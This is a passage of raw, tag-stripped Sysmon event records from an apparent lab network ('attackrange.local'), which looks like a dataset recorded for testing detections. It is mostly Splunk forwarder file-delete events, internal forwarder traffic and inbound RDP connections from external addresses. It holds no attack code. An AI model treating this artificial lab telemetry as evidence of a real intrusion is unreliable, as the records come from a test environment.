AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53246-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:09.280{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=356A135E29070E7FA0475D61AD8971E5,SHA256=D89EDCA3A8D2BF645A7B1896C1E4D4C49E4C623F90B0FF36ADF352CDF45E0247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977172Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:10.659{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57989828D342AF6B8AD699D637DF0AD0,SHA256=EA8229505B3E1E4FCE41E1B11D3800BCB80750C73C21E5223997B187C48F4055,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:10.317{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D4A72CFEF23CF9ECA2B10C9D952D02,SHA256=67006CFC144F33D0A39860790A689C5714EF2C23EE8C7D3D4FB5217D2F2F1C53,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977171Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:06.891{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-51832-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977174Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:11.784{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B65AC6643B2C40FF37479C4C617B51D,SHA256=A54022FA50F4BF57630023196DC2F8B44ED3BD2F4352CA2BF311F0EDF584AB01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977173Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:11.675{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E283B9618E5EEBCF5E02EAF2C784F25D,SHA256=CD353C59A2DA29FF533C2CE23EF45FBC4F52E9D60B387A9A75C08770903C254D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:11.746{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C30EE8CCC0EFBBDB6CC2142276F6A17,SHA256=B59913333092F865183B36651D74F564239EB58DC710ECBD8AF284A1783A4BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:11.347{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1A3B10C10CA4E3F3C4738F61E0A5777,SHA256=A5B8D6166F59B6FFF5CCABFD5DAEFF51EB93DF411673FB9A1075553990D99683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977175Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:12.690{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A08AC078658835B83A1D8A83289B102,SHA256=8139273D9912727326E66259F661432B55FEF17BF2D2AD396CB5B5B6BD8D18DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:10.096{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60848-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:12.361{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C113412D07D7E66333F297F403627DC,SHA256=4C396A43EF9CD3DE97E05985100DF702D7C5C685184A32CD83ABB5A4FD4B6800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977178Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:13.690{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0380B5D4C3AE561E83359C71B10509A2,SHA256=672A1D85E6B6D5C7CB4B728B741232567CB374D287A2D9B9931FD35F6F1ED2AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:13.395{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0A7C2E3EA79483121C89BA0E259C3B2,SHA256=E945E6C9920C2AEC669D197B9FCAB348543CBAAB389CFF2F3C99B27C36B898A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977177Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:10.772{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59290-false10.0.1.12-8000- 23542300x8000000000000000977176Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:13.518{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977180Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:14.706{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3018390F09E03E1648A2769C024AC023,SHA256=CC5F43385D82CB392E097D5A14512A9111783BC7F7AF0E618C81609368D96554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:14.412{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE9323272EB3603602F321A3F04877C,SHA256=4D21078CA664105EC15A181132CB0DF19CD93611F5ECFF4C08C00CF1A554365D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977179Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:11.799{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-21517-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977184Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:15.721{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7BDAD7E635953FCFDA18200A42E40F2,SHA256=A6068CE45B2FB850FD79E4F524B71082623954411B423F7C8EDB8B2F12D98AC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:13.836{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53247-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:15.458{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A707F8473811291BAD279860FCB717,SHA256=24740CE69F6FBBD768D95B4ADC76FE884FA5D5D24C565D4E6A78DDD1E8C8A8DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977183Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:12.253{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60700-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977182Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:12.148{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59291-false10.0.1.12-8089- 23542300x8000000000000000977181Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:15.315{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1DDBF9278CC481ED4BFFAD07B4A884D,SHA256=B4FC82078BD6A1201CF28B1443BCC3AD7243EF6CF7BD087C47C39545DB8E7CB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977186Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:16.846{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC1CC0979DF1C5B7CC8CE8DAE99C5D7B,SHA256=FD989293D297933D9C6ADB9A78307D9A2AC2650835CAA27EFF6C4AEB8E54BA2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977185Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:16.737{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52543EFAB3F128763B47C535F9C7EE29,SHA256=5B13CE7B07628324F157611726AFE683473F1DADBAC635D6226DAFA80BC5CF67,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:13.897{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61083-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:16.460{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=282AFE9EE06CB798A2EBFC6D71C884D7,SHA256=FC96DB8C806F2FBEFB920E5C95D0B51B25F466EAD33E03DAA7C1C0608D174F69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:16.112{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39ADF010DD936F0EBC1ADCAE2B8A2780,SHA256=8CB7EEE376E52EEA17D986171B57526850C9D9F4E69D9A33B6AEA51AB331EA5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977187Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:17.737{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F485785E054DD5ED2AA974A5F0B378F4,SHA256=1486F1A21EA44B754D3C000BD04AB42E476BF08E0593EAE485066829DE69E593,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:15.983{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53248-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001048590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:15.982{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53248-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001048589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:17.535{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40D5CF9D16EC04B5816F39ABC9CE9475,SHA256=FAC9FF6D9844132C6DCDA39491D9DE5501CACD2557D6AA3B4C6AAF59ADE13202,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:17.519{5EBD8912-7F30-614D-0D00-00000000FC01}8886076C:\Windows\system32\svchost.exe{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:17.317{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C24C0397FF785C01712260B968B98C9,SHA256=2A6CD30DBA50D70C17441CE40C4556F5885115DAF8D58F9BE1CC4492DEBE994B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977188Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:18.753{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DDB3D7E998159A427CBD502CD05851C,SHA256=880147EBAF9510275C1C4126C8FDEDB62FE07E04B1D68B4C4F39C735DF4C9045,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:18.542{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB0CF3604868A0E5BA5C143DA3814DC7,SHA256=0B7A0BB75F236070B2784B6985D1734AEE862825F9CC545756A43437D6C2A963,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977193Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:16.800{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-50503-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977192Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:16.710{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59292-false10.0.1.12-8000- 354300x8000000000000000977191Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:16.672{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50318-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977190Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:19.769{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAF7243EEA2085C64E6725CDAD31A3D9,SHA256=4557675AD7DB240DA0F7BD21381AA456E0159428591384EF6929A3107F3EAE26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:19.993{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4300MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:17.520{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50156-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:19.557{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71BCE3B49D29CD4600DB71F5B8D422E4,SHA256=113BDD13F45AAA7BA8DF62A67AC83D858FBF09DAF33324B729A2015427D19DBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977189Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:19.362{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=458099BFC791B830CC2C60D7CF1BEE7C,SHA256=ACA7C34817FE59080C4BCB850F5EBE5D7A404850B1E9A647C64A225725C82FF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:19.126{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5AB617DDF56C10238C7594AEAD2D6F61,SHA256=8DFCA98652DFC9085BF9DEF0C092C7601E9F833FB9FB2815DB00BC98297D2BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977194Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:20.784{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D87B7F4565E3DD83F3B4691E1C445F79,SHA256=3CBEE6887B92592EC8DDF8DB541D68814915712CCE624A5C2E8CAC6E1185705D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:20.993{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4301MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:20.560{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8459DFAB5773AA4C39DCF04D316BA611,SHA256=05C36974FE14B0544184C134FF70CAA69973DF9E4620DBE9169E02DCF1068B65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977196Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:21.784{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68911553140CDA41E0B8AACCD0FFC4B3,SHA256=D8E930DBFE9AA7D37C399425E6DD58131F8AF475EAA9CF87D002D993C199F051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977195Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:21.784{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE3AD240B0A3A36BA86E7FF40A92DB14,SHA256=22E437F9971AA80A802322502829F1FA2006A02B82FCD75CE82E6580466A6AF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:19.768{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53249-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:21.591{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=521DBF0F4CD3F4B52508D80BAB534CEC,SHA256=51CE333AD892B317900B974466BBA4B11EA521BE72C8D678FB9C723A6F7CFC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977197Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:22.786{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C1047F712F2302FFB49E180616DBEDE,SHA256=ACF259763ABD4508F473FAFFEDA68E94F2CC8105BEB7BF33284AE3AADCD6D0CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:20.825{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65400-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:22.600{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 